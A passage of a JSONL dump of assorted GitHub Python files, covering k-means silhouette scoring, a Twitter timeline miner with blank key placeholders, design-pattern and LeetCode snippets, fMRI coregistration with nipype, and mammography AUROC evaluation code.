max(a,b)\ndef silhouetteScore(mus, assignmentsIndexList, vectorList):\n '''\n citation: http://www.sciencedirect.com/science/article/pii/0377042787901257\n\n For each point p, first find the average distance between p and all other points in the\n same cluster (this is a measure of cohesion, call it A). Then find the average distance\n between p and all points in the nearest cluster (this is a measure of separation from the\n closest other cluster, call it B). The silhouette coefficient for p is defined as the difference\n between B and A divided by the greater of the two (max(A,B)).\n\n We evaluate the cluster coefficient of each point and from this we can obtain the\n 'overall' average cluster coefficient.\n\n Intuitively, we are trying to measure the space between clusters.\n If cluster cohesion is good (A is small) and cluster separation is good (B is large),\n the numerator will be large, etc.\n\n S(i) will be a good measure of how tight each cluster is coupled.\n '''\n\n # assignmentsIndexList: index = the ith sentence, value = centroid of that sentence\n # vectorList: vector representation of a sentence\n silhouetteScoreL = list()\n muResultList = [list() for _ in range(len(mus))]\n for sentenceID in range(len(vectorList)):\n sVec = vectorList[sentenceID]\n muInd = assignmentsIndexList[sentenceID]\n sMu = mus[muInd]\n sCosSimilarity = dot(sVec, sMu)\n muResultList[muInd].append((sCosSimilarity, sentenceID))\n\n for ptInd in range(len(assignmentsIndexList)):\n sVec = vectorList[ptInd]\n mu = mus[assignmentsIndexList[ptInd]]\n currDist = dot(sVec, mu)\n allDist = [dot(sVec, mu) for mu in mus]\n allDist.remove(currDist)\n\n nextClosestDist = 0\n nextClosestClusterInd = 0\n for distInd in range(len(allDist)):\n if allDist[distInd] > nextClosestDist:\n nextClosestDist = allDist[distInd]\n nextClosestClusterInd = distInd\n\n nextClosestPtsList = muResultList[nextClosestClusterInd]\n\n # because the more positive it is, the more similar the two words are...\n\n b = mean(array([dot(sVec, vectorList[sID]) for _, sID in nextClosestPtsList]))\n\n ptsSameLabelList = muResultList[assignmentsIndexList[ptInd]]\n allDistA = [dot(sVec, vectorList[sID]) for _, sID in ptsSameLabelList]\n maxA = max(allDistA)\n allDistA.remove(maxA)\n a = mean(allDistA)\n\n silhouetteScoreL.append((a-b) / max(a, b))\n return silhouetteScoreL\n\n# # Filter out sentences that are the farthest to their centroids.\n# muResultList = [list() for _ in xrange(len(musR))]\n# for sentenceID in range(len(sentenceList)):\n# sVec = vectorListR[sentenceID]\n# muInd = assignmentsIndexListR[sentenceID]\n# sMu = musR[muInd]\n# sCosSimilarity = dot(sVec, sMu)\n# muResultList[muInd].append((sCosSimilarity, sentenceList[sentenceID]))\n#\n# for muListInd in range(len(muResultList)):\n# muResultList[muListInd] = sorted(muResultList[muListInd])\n#\n# print '\\nanormalies for each centroid:'\n# for val in muResultList:\n# print val[0]\n#\n# print '\\ncentroids:'\n# for val in muResultList:\n# print val[-1]\n\n# starting from the given centroid:\n","repo_name":"goyalanish/LegalDocSummarizer","sub_path":"Kmeans.py","file_name":"Kmeans.py","file_ext":"py","file_size_in_byte":7693,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"38731173730","text":"import twitter, re, datetime, pandas as pd\n\nclass twitterminer():\n\n request_limit = 20 \n api = False\n data = []\n \n\t\n twitter_keys = {\n 'consumer_key': \"\" , #add your consumer key\n 'consumer_secret': \"\" , #add your consumer secret key\n 'access_token_key': \"\" , #add your access token key\n 'access_token_secret': \"\" #add your access token secret key\n }\n \n def __init__(self, request_limit = 100):\n \n self.request_limit = request_limit\n \n # This sets the twitter API object for use internall within the class\n self.set_api()\n \n def set_api(self):\n \n self.api = twitter.api(\n consumer_key = self.twitter_keys['consumer_key'],\n consumer_secret = self.twitter_keys['consumer_secret'],\n access_token_key = self.twitter_keys['access_token_key'],\n\t\t\taccess_token_secret = self.twitter_keys['access_token_secret']\n )\n\n def mine_user_tweets(self, user=\"anamikap24\", mine_retweets=False):\n\n statuses = self.api.GetUserTimeline(screen_name=user, count=self.request_limit)\n data = []\n\t\t\n for item in statuses:\n\n mined = {\n 'tweet_id': item.id,\n 'handle': item.user.name,\n 'retweet_count': item.retweet_count,\n 'text': item.text,\n 'mined_at': datetime.datetime.now(),\n 'created_at': item.created_at\n }\n \n data.append(mined)\n #status = self.api.PostUpdate('I love python-twitter!') \n return statuses\n\n def favourite(self,user):\n\n\n status = self.api.GetFollowers(screen_name=user,count = self.request_limit)\n # for item in status:\n # print(item.users.name)\n print(status)\n\n \n\n\nminer = twitterminer()\n\n# insert handle we like\ntrump_tweets = miner.mine_user_tweets(\"countermukul\")\n#trump_df = pd.DataFrame(trump_tweets)\nprint(trump_tweets)\n","repo_name":"AnamikaPa/Sentiment_Analysis","sub_path":"Twitter_Program/tweet.py","file_name":"tweet.py","file_ext":"py","file_size_in_byte":2130,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"83"} +{"seq_id":"21637361445","text":"#!/usr/bin/python\n# encoding: utf-8\n'''\n\n\tExemplo do Padrão de Projeto Singleton em Python \n\n'''\n\nclass Singleton(object):\n\t_instance = None\n\t\n\tdef __new__(cls):\n\t\tif cls._instance is None:\n\t\t\tprint('Creating a singleton class...')\n\t\t\tcls._instance = super(Singleton,cls).__new__(cls)\n\t\t\t\n\t\treturn cls._instance\n\t\t\n\n\n# ---------- tests ----------\n\nif __name__ == \"__main__\":\n\n\tobj1 = Singleton()\n\tprint(obj1)\n\t\n\tobj2 = Singleton()\n\tprint(obj2)\n\t\n\tprint('Are obj1 equals to obj2?', obj1 is obj2)\n\t\n\t\n","repo_name":"xslyrs/SimplePatterns","sub_path":"singleton.py","file_name":"singleton.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"47804094344","text":"class Solution(object):\n def findMinHeightTrees(self, n, edges):\n \"\"\"\n :type n: int\n :type edges: List[List[int]]\n :rtype: List[int]\n \"\"\"\n if not edges:\n return [0]\n dictedges={}\n degreen=[0]*n\n for edge in edges:\n degreen[edge[0]]+=1\n degreen[edge[1]]+=1\n if edge[0] not in dictedges:\n dictedges[edge[0]]=[edge[1]]\n else:\n dictedges[edge[0]].append(edge[1])\n if edge[1] not in dictedges:\n dictedges[edge[1]]=[edge[0]]\n else:\n dictedges[edge[0]].append(edge[1])\n \n stack=[]\n for k in range(len(degreen)):\n if degreen[k]==1:\n stack.append(k)\n \n while len(stack)>2 or max(degreen)>1:\n tmp=[]\n for i in stack:\n for edge in dictedges[i]:\n degreen[edge]-=1\n if degreen[edge]==1:\n tmp.append(edge)\n stack=tmp\n \n return stack\n \n","repo_name":"yangzongwu/leetcode","sub_path":"archives/leetcode2/0310. Minimum Height Trees.py","file_name":"0310. Minimum Height Trees.py","file_ext":"py","file_size_in_byte":1131,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"83"} +{"seq_id":"24628130337","text":"def morale_check_logic(self):\n if self.morale <= 10: # Retreat state when morale lower than 10\n self.broken = True\n for this_subunit in self.alive_subunit_list:\n if this_subunit.broken is False: # unit not broken yet since there is subunit not broken\n self.broken = False\n if self.state not in (98, 99):\n self.state = 98\n if self.retreat_start is False:\n self.retreat_start = True\n\n elif self.retreat_start and self.broken is False and self.morale >= 50: # quit retreat when morale reach increasing limit\n self.retreat_start = False\n self.retreat_way = False\n self.issue_order(self.base_pos, False, False, other_command=\"Stop\")\n\n if self.retreat_start and self.state != 96:\n self.find_retreat_target()\n","repo_name":"robgamerz19/Masendor","sub_path":"gamescript/tactical/unit/morale_check_logic.py","file_name":"morale_check_logic.py","file_ext":"py","file_size_in_byte":818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"83"} +{"seq_id":"22573685886","text":"\"\"\"Tests for the ilo module\"\"\"\nimport pandas as pd\nimport pytest\n\nfrom bblocks.import_tools import ilo\nfrom bblocks import set_bblocks_data_path, config\n\nset_bblocks_data_path(config.BBPaths.tests_data)\n\n\nclass TestILO:\n \"\"\"Tests for ILO module\"\"\"\n\n obj = ilo.ILO()\n obj_2 = ilo.ILO()\n\n indicator_1 = \"CLD_TPOP_SEX_AGE_GEO_NB_A\"\n indicator_2 = \"CPI_XCPI_COI_RT_Q\"\n indicator_list = [\"CLD_TPOP_SEX_AGE_NB_A\", \"CLD_XCHD_SEX_AGE_NB_A\"]\n\n def test_update_data_error(self):\n \"\"\"Test that update_data raises an error because no data is loaded\"\"\"\n\n with pytest.raises(RuntimeError, match=\"No indicators loaded\"):\n self.obj.update_data()\n\n def test_available_indicators(self):\n \"\"\"Test that the available indicators are returned and loaded to the object\"\"\"\n\n assert isinstance(self.obj.available_indicators(), pd.DataFrame)\n assert self.obj._available_indicators is not None\n\n def test_load_glossaries(self):\n \"\"\"Test that the glossaries are loaded to the object\"\"\"\n\n self.obj._load_glossaries()\n assert isinstance(self.obj._glossaries, dict)\n\n # check that the values are dictionaries\n key = list(self.obj._glossaries.keys())[0]\n assert isinstance(self.obj._glossaries[key], dict)\n\n def test_load_area_dict(self):\n \"\"\"Test that the area dictionary is loaded to the object\"\"\"\n\n self.obj._load_area_dict()\n assert isinstance(self.obj._area_dict, dict)\n\n def test_load_data(self):\n \"\"\"Test loading a single indicator\"\"\"\n\n self.obj.load_data(self.indicator_1)\n assert self.indicator_1 in self.obj._data\n assert isinstance(self.obj._data[self.indicator_1], pd.DataFrame)\n\n self.obj._glossaries = None # set glossaries back to None\n self.obj._area_dict = None # set area dictionary back to None\n\n self.obj.load_data(self.indicator_2)\n assert self.indicator_2 in self.obj._data\n assert isinstance(self.obj._data[self.indicator_2], pd.DataFrame)\n\n assert (\n self.indicator_1 in self.obj._data\n ) # check that first indicator is still there\n\n def test_load_data_list(self):\n \"\"\"Test loading a list of indicators\"\"\"\n\n self.obj.load_data(self.indicator_list)\n assert self.indicator_list[0] in self.obj._data\n assert isinstance(self.obj._data[self.indicator_list[0]], pd.DataFrame)\n assert self.indicator_list[1] in self.obj._data\n assert isinstance(self.obj._data[self.indicator_list[1]], pd.DataFrame)\n\n def test_load_data_error(self):\n \"\"\"Test that an error is raised if the indicator is invalid\"\"\"\n\n with pytest.raises(ValueError, match=\"Indicator not available\"):\n self.obj.load_data(\"invalid\")\n\n def test_update_data_when_data_loaded_from_disk(self):\n \"\"\"Test that the data is updated correctly when data is loaded from disk\"\"\"\n\n # mock data loaded from disk - data object is not empty but glossaries and areas are empty\n self.obj_2.load_data(self.indicator_1)\n self.obj_2._glossaries = None\n self.obj_2._area_dict = None\n\n self.obj_2.update_data()\n assert self.indicator_1 in self.obj_2._data\n assert isinstance(self.obj_2._data[self.indicator_1], pd.DataFrame)\n assert self.obj_2._glossaries is not None\n assert self.obj_2._area_dict is not None\n","repo_name":"ONEcampaign/bblocks","sub_path":"tests/test_import_tools/test_ilo.py","file_name":"test_ilo.py","file_ext":"py","file_size_in_byte":3414,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"83"} +{"seq_id":"16832784798","text":"import functools\nimport random\nfrom trace import pens\n\nfrom PyQt5 import QtGui, QtCore, QtWidgets\nimport PyQt5.uic\nimport numpy\n\nfrom .AverageViewTable import AverageViewTable\nfrom . import MainWindowWidget\nfrom scan.ScanControl import ScanControl\nfrom fit.FitUi import FitUi\nfrom modules import DataDirectory\nfrom trace.PlottedTrace import PlottedTrace\nfrom trace.TraceCollection import TraceCollection\nfrom trace.Traceui import Traceui\n\nimport os\nuipath = os.path.join(os.path.dirname(__file__), '..', 'ui/testExperiment.ui')\ntestForm, testBase = PyQt5.uic.loadUiType(uipath)\n\nclass test(testForm, MainWindowWidget.MainWindowWidget):\n StatusMessage = QtCore.pyqtSignal( str )\n ClearStatusMessage = QtCore.pyqtSignal()\n experimentName = 'Test Scan'\n\n def __init__(self,globalVariablesUi, parent=None, measurementLog=None):\n MainWindowWidget.MainWindowWidget.__init__(self, parent)\n testForm.__init__(self)\n self.globalVariablesUi = globalVariablesUi\n self.measurementLog = measurementLog \n# pyqtgraph.setConfigOption('background', 'w')\n# pyqtgraph.setConfigOption('foreground', 'k')\n\n def setupUi(self, MainWindow, config):\n testForm.setupUi(self, MainWindow)\n self.config = config\n self.plottedTrace = None\n self._graphicsView = self.graphicsLayout._graphicsView\n self.penicons = pens.penicons().penicons()\n self.traceui = Traceui(self.penicons, self.config, \"testExperiment\", { \"Plot Window\": {'view': self._graphicsView}})\n self.traceui.setupUi(self.traceui)\n self.dockWidget.setWidget( self.traceui )\n self.dockWidgetList.append(self.dockWidget)\n self.fitWidget = FitUi(self.traceui, self.config, \"testExperiment\", globalDict = self.globalVariablesUi.variables )\n self.fitWidget.setupUi(self.fitWidget)\n self.dockWidgetFitUi.setWidget( self.fitWidget )\n self.dockWidgetList.append(self.dockWidgetFitUi )\n self.displayUi = AverageViewTable(self.config)\n self.displayUi.setupUi()\n self.displayDock = QtWidgets.QDockWidget(\"Average\")\n self.displayDock.setObjectName(\"Average\")\n self.displayDock.setWidget( self.displayUi )\n self.addDockWidget(QtCore.Qt.RightDockWidgetArea, self.displayDock)\n self.dockWidgetList.append(self.displayDock )\n if 'testWidget.MainWindow.State' in self.config:\n QtWidgets.QMainWindow.restoreState(self, self.config['testWidget.MainWindow.State'])\n#start added\n self.scanControlWidget = ScanControl(config, self.globalVariablesUi, self.experimentName)\n self.scanControlWidget.setupUi(self.scanControlWidget)\n self.scanControlUi.setWidget(self.scanControlWidget )\n self.dockWidgetList.append(self.scanControlUi)\n#end added\n self.tabifyDockWidget( self.dockWidgetFitUi, self.scanControlUi )\n\n def addPushDestination(self, name, destination):\n# self.fitWidget.addPushDestination(name, destination)\n pass\n \n def setPulseProgramUi(self, pulseProgramUi):\n self.pulseProgramUi = pulseProgramUi\n self.pulseProgramUi.addExperiment('Sequence')\n\n def onClear(self):\n self.dockWidget.setShown(True)\n self.StatusMessage.emit(\"test Clear not implemented\")\n \n def onSave(self):\n self.StatusMessage.emit(\"test Save not implemented\")\n\n def onStart(self):\n self.scanType = self.scanControlWidget.scanRepeatComboBox.currentIndex()\n#start added\n if self.scanType == 0:\n self.startScan()\n elif self.scanType == 1:\n self.createAverageScan()\n self.startScan()\n#end added\n self.timer = QtCore.QTimer()\n self.timer.setInterval(10)\n self.timer.timeout.connect( self.onData )\n self.timer.start(10)\n self.displayUi.onClear()\n\n#start added\n def createAverageScan(self):\n self.averagePlottedTrace = PlottedTrace(TraceCollection(), self._graphicsView, pens.penList)\n self.averagePlottedTrace.trace.name = \"test average trace\"\n self.averagePlottedTrace.trace.description[\"comment\"] = \"average trace comment\"\n self.averagePlottedTrace.trace.filenameCallback = functools.partial(self.traceFilename, '')\n self.traceui.addTrace(self.averagePlottedTrace, pen=0)\n#end added\n\n def startScan(self):\n if self.plottedTrace is not None and self.traceui.unplotLastTrace():\n self.plottedTrace.plot(0)\n self.plottedTrace = PlottedTrace(TraceCollection(), self._graphicsView, pens.penList)\n self.xvalue = 0\n self.phase = 0 #random.uniform(0,2*numpy.pi)\n self.plottedTrace.trace.x = numpy.array([self.xvalue])\n c = numpy.sin( self.xvalue + self.phase)**2\n self.plottedTrace.trace.y = numpy.array([random.gauss(c, 0.1)])#c*(1-c))])\n self.plottedTrace.trace.top = numpy.array([0.05])\n self.plottedTrace.trace.bottom = numpy.array([0.05])\n self.plottedTrace.trace.filenameCallback = functools.partial( self.traceFilename, '' )\n if self.scanType == 0:\n self.plottedTrace.trace.name = \"test trace\"\n self.plottedTrace.trace.description[\"comment\"] = \"My Comment\"\n self.traceui.addTrace(self.plottedTrace, pen=-1)\n#start added\n elif self.scanType == 1:\n self.traceui.addTrace(self.plottedTrace, pen=-1, parentTrace=self.averagePlottedTrace)\n self.plottedTrace.trace.name = \"test trace {0}\".format(self.averagePlottedTrace.childCount())\n self.plottedTrace.trace.description[\"comment\"] = \"My Comment {0}\".format(self.averagePlottedTrace.childCount())\n#end added\n\n def onData(self):\n self.xvalue += 0.05\n self.plottedTrace.trace.x = numpy.append( self.plottedTrace.trace.x, self.xvalue )\n c = numpy.sin( self.xvalue + self.phase)**2\n value = random.gauss(c, 0.1)#c*(1-c))\n self.plottedTrace.trace.y = numpy.append( self.plottedTrace.trace.y, value )\n self.plottedTrace.trace.top = numpy.append( self.plottedTrace.trace.top, 0.05)\n self.plottedTrace.trace.bottom = numpy.append( self.plottedTrace.trace.bottom, 0.05)\n self.displayUi.add( [value] )\n self.plottedTrace.replot()\n if self.xvalue > 500:\n if self.scanType == 0:\n self.onStop()\n#start added\n elif self.scanType == 1:\n self.averagePlottedTrace.averageChildren()\n self.averagePlottedTrace.plot(7) #average plot is in black\n self.startScan()\n#end added\n \n def onStop(self):\n if hasattr(self, 'timer'):\n self.timer.stop()\n \n def onPause(self):\n self.StatusMessage.emit(\"test Pause not implemented\")\n \n def activate(self):\n self.StatusMessage.emit(\"test active\")\n MainWindowWidget.MainWindowWidget.activate(self)\n \n def deactivate(self):\n self.StatusMessage.emit(\"test not active\")\n MainWindowWidget.MainWindowWidget.deactivate(self)\n \n def saveConfig(self):\n self.config['testWidget.MainWindow.State'] = QtWidgets.QMainWindow.saveState(self)\n self.traceui.saveConfig()\n self.fitWidget.saveConfig()\n \n def traceFilename(self, pattern):\n directory = DataDirectory.DataDirectory()\n path, _ = QtWidgets.QFileDialog.getSaveFileName(self, 'Save file', directory.path())\n return path\n\n def setGlobalVariablesUi(self, globalVariablesUi ):\n self.globalVariables = globalVariablesUi.variables\n self.globalVariablesChanged = globalVariablesUi.valueChanged\n self.globalVariablesUi = globalVariablesUi\n #self.fitWidget.addPushDestination('Global', globalVariablesUi )\n","repo_name":"pyIonControl/IonControl","sub_path":"gui/testExperiment.py","file_name":"testExperiment.py","file_ext":"py","file_size_in_byte":7737,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"83"} +{"seq_id":"33886768790","text":"#!/usr/bin/python\nimport commands\n\nfilename='SLIMSTACK_200_NED.emp'\noutfile=open(filename,'w')\noutfile.write( \"\"\"PCBNEW-LibModule-V1 7/5/2010 9:25:37 PM\n$INDEX\nSLIMSTACK_200\n$EndINDEX\n$MODULE SLIMSTACK_200\nPo 0 0 0 15 4C31E3F1 4C31D72E ~~\nLi SLIMSTACK_200\nCd SLIMSTACK_200\nKw SLIMSTACK_200\nSc 4C31D72E\nAR \nOp 0 0 0\nAt SMD \nT0 -6063 79 500 500 0 35 N V 21 N\"SLIMSTACK_200\"\nT1 4252 118 500 500 0 35 N V 21 N\"P\"\\n\"\"\")\nA=62.865\nAin=A/25.4*10000\npitch = Ain / 99.0\n\norigin = Ain/2\nfor letter in ['A','B','C','D']:\n if letter=='A':\n xcoord=-1024\n elif letter=='B':\n xcoord=1024\n elif letter=='C':\n xcoord=18750-1024\n elif letter=='D':\n xcoord=18740+1024\n\n for num in range(0,100):\n outfile.write(\"$PAD\\n\")\n outfile.write('Sh \"'+letter+str(num+1)+'\" R 709 138 0 0 0\\n')\n outfile.write('Dr 0 0 0\\n')\n outfile.write('At SMD N 00888000\\n')\n outfile.write('Ne 0 \"\"\\n')\n outfile.write('Po '+str(xcoord)+' '+str(int(-origin+pitch*num))+\"\\n\")\n outfile.write('$EndPAD\\n')\noutfile.write(\"$EndMODULESLIMSTACK_200\\n\")\noutfile.write(\"$EndLIBRARY\\n\")\noutfile.close()\ncommands.getoutput('unix2dos '+filename)\n","repo_name":"jharvey/Cinch_enclosure_template","sub_path":"KICAD_Project/scripts/ned2.py","file_name":"ned2.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"83"} +{"seq_id":"71670830350","text":"from scipy.special import jv as bessel\nfrom scipy.special import jn_zeros as _zeros\nimport math\nI=100\nJ=100\nhr=0.01\nht=0.01\nd=0.1\nzeros=_zeros(1, 100) #excludes 0\nm=8\nzm=zeros[m-2]\nprint(\"zm = %d\\n\" %zm)\ndef bes(x):\n return bessel(0, x)\ndef sol(r, t):\n return bes(zm*r) * math.exp(- d * zm**2 * t)\n\n#folder = \"pres/rdiff3/\"\nfolder = \"\"\nconst_diff_ic = open(folder + \"rconst_diff_ic.scv\", \"w+\")\nuss='\\n'.join([';'.join(\n [','.join(\n map(str, [sol(i*hr, 0)] * 6)\n ) for i in range(I)]\n ) for J in range(J)])\nconst_diff_ic.write(uss)\nconst_diff_ic.close()\n#print(bessel(1, zm))\neach = 1\ntime = 0.1\nconst_diff_ex = open(folder + \"rconst_diff_ex.csv\", \"w+\")\nn_rows = int(time/ht/each+1)\nprint(\"n_rows = %d\\n\" %n_rows)\ntimes = [i*ht*each for i in range(0,n_rows)]\ndef sol_rs(t):\n return ','.join([str(sol(i*hr, t)) for i in range(0,I+1)])\nuss='\\n'.join(\n map(sol_rs, times))\nconst_diff_ex.write(uss)\nconst_diff_ex.close()\n","repo_name":"archqua/mitosis","sub_path":"cylinder/discont/kode/const_diff_test/rtest.py","file_name":"rtest.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"5690118930","text":"import os\nimport numpy as np\nimport nibabel as nib\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nimport nipype.interfaces.fsl as fsl # importing FSL interface functions\nfrom nilearn import image\nfrom nilearn.plotting import plot_anat, plot_epi, view_img\nfrom nipype import Node, Workflow # components to construct workflow\nfrom nipype.interfaces.io import DataSink # datasink\nfrom bids.layout import BIDSLayout # BIDSLayout object to specify file(s)\n\n\n# Directory where your data set resides.\ndataDir = '/tmp/Data/ds102'\n\n# Creating the layout object for this BIDS data set\nlayout = BIDSLayout(dataDir)\n\n# an fMRI image from one of the subjects (run 1 only)\nimagefMRI = layout.get(subject='26',\n run='1',\n suffix='bold',\n extension='nii.gz',\n return_type='file')[0]\n\n# T1 image from the layout object\nimageT1 = layout.get(subject='26',\n suffix='T1w',\n extension='nii.gz',\n return_type='file')[0]\n\n# Output directory\noutDir = os.path.join(dataDir, 'WorkflowOutput')\n\n\n\n# node to skip dummy scans\nextract = Node(fsl.ExtractROI(in_file=imagefMRI, # input image\n t_min=4, # first 4 volumes are deleted\n t_size=-1),\n name=\"extract\")\n\n# creating motion correction node\nmcflirt = Node(fsl.MCFLIRT(save_rms=True,\n save_plots=True,\n mean_vol=True), # saving displacement parameters\n name=\"mcflirt\")\n\n# creating co-registration node (estimating the coregistration parameters)\ncoreg = Node(fsl.FLIRT(reference=imageT1, # target: T1-weighted\n dof=6, # specifying rigid-body (6-parameters)\n cost='normmi'), # normizied mutual info\n name=\"coreg\")\n\n# applying the coregistration parameters to the entire time series\napplywarp = Node(fsl.FLIRT(reference=imageT1,\n apply_isoxfm=4), # forcing the voxel size = 4mm\n name=\"applywarp\")\n\n\n# creating datasink to collect outputs\ndatasink = Node(DataSink(base_directory=outDir),\n name='datasink')\n\n\n\n# creating a workflow\ncoReg = Workflow(name=\"coReg\", base_dir=outDir)\n\n# and connecting nodes\ncoReg.connect(extract,'roi_file', mcflirt, 'in_file')\n# mcflirt mean image as input for the first FLIRT\ncoReg.connect(mcflirt, 'mean_img', coreg, 'in_file')\n# mcflirt fMRI as input for the second FLIRT\ncoReg.connect(mcflirt, 'out_file', applywarp, 'in_file')\n# and passing on the rigid-body transformation parameters from first FLIRT\ncoReg.connect(coreg, 'out_matrix_file', applywarp,'in_matrix_file')\n\n# second FLIRT node to data sink\ncoReg.connect(applywarp, 'out_file', datasink, 'CoRegfMRI')\n# second motion corredted mean fMRI to data sink\ncoReg.connect(mcflirt, 'mean_img', datasink, 'MoCorMean')\n\n\n\n# writing out graph\ncoReg.write_graph(graph2use='orig', dotfilename='graph_orig.dot')\n\n# showing the graph\nplt.figure(figsize=[6,6])\nimg=mpimg.imread(os.path.join(outDir,\"coReg\",\"graph_orig.png\"))\nimgplot = plt.imshow(img)\nplt.axis('off')\nplt.show()\n\n\n\n# running the workflowhaxby_anat_filename\ncoReg.run()\n\n\n\n# examining the coregistration results\n# Coregistered fMRI\nimageCoRegfMRI = os.path.join(os.path.join(outDir,'CoRegfMRI'),\n 'sub-26_task-flanker_run-1_bold_roi_mcf_flirt.nii.gz')\n# mean of the co-registered fMRI\nmean_imageCoRegfMRI = image.mean_img(imageCoRegfMRI)\n\n\n# displaying the mean of the co-registered fMRI (axial)\ndisplay = plot_anat(mean_imageCoRegfMRI,\n display_mode='z',\n cut_coords=6)\n\n# adding edges from the corresponding T1w image\ndisplay.add_edges(imageT1)\n\n\n# displaying the mean of the co-registered fMRI (sagittal)\ndisplay = plot_anat(mean_imageCoRegfMRI,\n display_mode='x',\n cut_coords=6)\n\n# adding edges from the corresponding T1w image\ndisplay.add_edges(imageT1)\n\n\n# displaying the mean of the co-registered fMRI (coronal)\ndisplay = plot_anat(mean_imageCoRegfMRI,\n display_mode='y',\n cut_coords=6)\n\n# adding edges from the corresponding T1w image\ndisplay.add_edges(imageT1)\n\n\n\n\n# Just for fun; original fMRI and T1 -- how different they are\n# mean fMRI from motion corrected\nimageMoCorfMRI = os.path.join(os.path.join(outDir,'MoCorMean'),\n 'sub-26_task-flanker_run-1_bold_roi_mcf.nii.gz_mean_reg.nii.gz')\n# displaying the mean of the co-registered fMRI (axial)\ndisplay = plot_anat(imageMoCorfMRI,\n display_mode='z',\n cut_coords=6)\n\n# adding edges from the corresponding T1w image\ndisplay.add_edges(imageT1)\n","repo_name":"sathayas/fMRIClassFall2019","sub_path":"Norm/CoReg.py","file_name":"CoReg.py","file_ext":"py","file_size_in_byte":4825,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"83"} +{"seq_id":"7592338824","text":"import pickle\nimport sys\n\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\n\nimport numpy as np\nimport pandas as pd\nimport sklearn.metrics as metrics\nfrom sklearn.utils import resample\n\n\ndef breast_or_image_level(prediction_file):\n df = pd.read_csv(prediction_file, header=0)\n if \"left_malignant\" in list(df.columns.values):\n return \"breast\"\n else:\n return \"image\"\n\n\ndef calc_confidence_interval(sample, confidence=0.95):\n sorted_scores = np.array(sample)\n sorted_scores.sort()\n\n margin = (1 - confidence) / 2 # e.g. 0.025 for 0.95 confidence range\n confidence_lower = sorted_scores[int(margin * len(sorted_scores))] # e.g. 0.025\n confidence_upper = sorted_scores[int((1 - margin) * len(sorted_scores))] # e.g. 0.975\n\n return confidence_lower, confidence_upper\n\n\ndef generate_statistics(labels, predictions, name, bootstrapping=False):\n roc_auc = metrics.roc_auc_score(labels, predictions)\n roc_curve_path = plot_roc_curve(predictions, labels, name)\n precision, recall, thresholds = metrics.precision_recall_curve(labels, predictions)\n pr_curve_path = plot_pr_curve(precision, recall, name)\n pr_auc = metrics.auc(recall, precision)\n\n print_str = \"\\nImage-level metrics:\" if 'image_level' in name else \"\\nBreast-level metrics:\"\n print(print_str)\n\n if bootstrapping:\n n_samples = len(labels)\n if n_samples < 8:\n print(\"Bootstrapping is calculated only when there are more than 8 samples.\")\n else:\n n_bootstraps = 2000\n\n b_roc_auc_list = []\n b_pr_auc_list = []\n for i in range(n_bootstraps):\n boot = resample(list(zip(labels, predictions)), replace=True, n_samples=n_samples)\n b_labels, b_predictions = list(zip(*boot))\n\n if len(list(set(b_labels))) == 1:\n n_bootstraps -= 1\n continue\n\n b_roc_auc = metrics.roc_auc_score(b_labels, b_predictions)\n b_roc_auc_list.append(b_roc_auc)\n precision, recall, thresholds = metrics.precision_recall_curve(b_labels, b_predictions)\n b_pr_auc = metrics.auc(recall, precision)\n b_pr_auc_list.append(b_pr_auc)\n\n roc_CI_lower, roc_CI_upper = calc_confidence_interval(b_roc_auc_list)\n pr_CI_lower, pr_CI_upper = calc_confidence_interval(b_pr_auc_list)\n print(f\"\\n AUROC: {roc_auc:.3f} (95% CI: {roc_CI_lower:.3f}-{roc_CI_upper:.3f})\",\n f\"\\n AUPRC: {pr_auc:.3f} (95% CI: {pr_CI_lower:.3f}-{pr_CI_upper:.3f})\",\n f\"\\n Confidence intervals calculated with bootstrap with {n_bootstraps} replicates.\")\n else:\n print(f\"\\n AUROC: {roc_auc:.3f}\",\n f\"\\n AUPRC: {pr_auc:.3f}\")\n \n print(f\"\\n ROC Plot: {roc_curve_path}\",\n f\"\\n PRC Plot: {pr_curve_path}\")\n\n\ndef get_image_level_scores(prediction_file, bootstrapping=False):\n prediction_df = pd.read_csv(prediction_file, header=0)\n predictions = prediction_df['malignant_pred'].tolist()\n labels = prediction_df['malignant_label'].tolist()\n name = prediction_file.split('.')[0] + \"_image_level\"\n\n generate_statistics(labels, predictions, name, bootstrapping)\n\n\ndef get_breast_level_scores(prediction_file, pickle_file, bootstrapping=False):\n prediction_df = pd.read_csv(prediction_file, header=0)\n predictions = prediction_df['left_malignant'].tolist() + prediction_df['right_malignant'].tolist()\n with open(pickle_file, 'rb') as f:\n exam_dict = pickle.load(f)\n left_malignant_labels = []\n right_malignant_labels = []\n for exam in exam_dict:\n left_malignant_labels.append(exam['cancer_label']['left_malignant'])\n right_malignant_labels.append(exam['cancer_label']['right_malignant'])\n labels = left_malignant_labels + right_malignant_labels\n\n name = prediction_file.split('.')[0] + \"_breast_level\"\n\n generate_statistics(labels, predictions, name, bootstrapping)\n\n\ndef get_breast_level_scores_from_image_level(prediction_file, pickle_file, bootstrapping=False):\n with open(pickle_file, 'rb') as f:\n exam_dict = pickle.load(f)\n\n il_prediction_df = pd.read_csv(prediction_file, header=0)\n\n left_malignancy = []\n right_malignancy = []\n left_labels = []\n right_labels = []\n\n # Iterate over pickle file\n for d in exam_dict:\n left_score = 0\n left_images = 0\n right_score = 0\n right_images = 0\n for v in ['L-CC', 'L-MLO', 'R-CC', 'R-MLO']:\n # Skip over views that don't have any images\n if v not in d or len(d[v]) == 0:\n continue\n\n if v[0] == 'L':\n left_score += 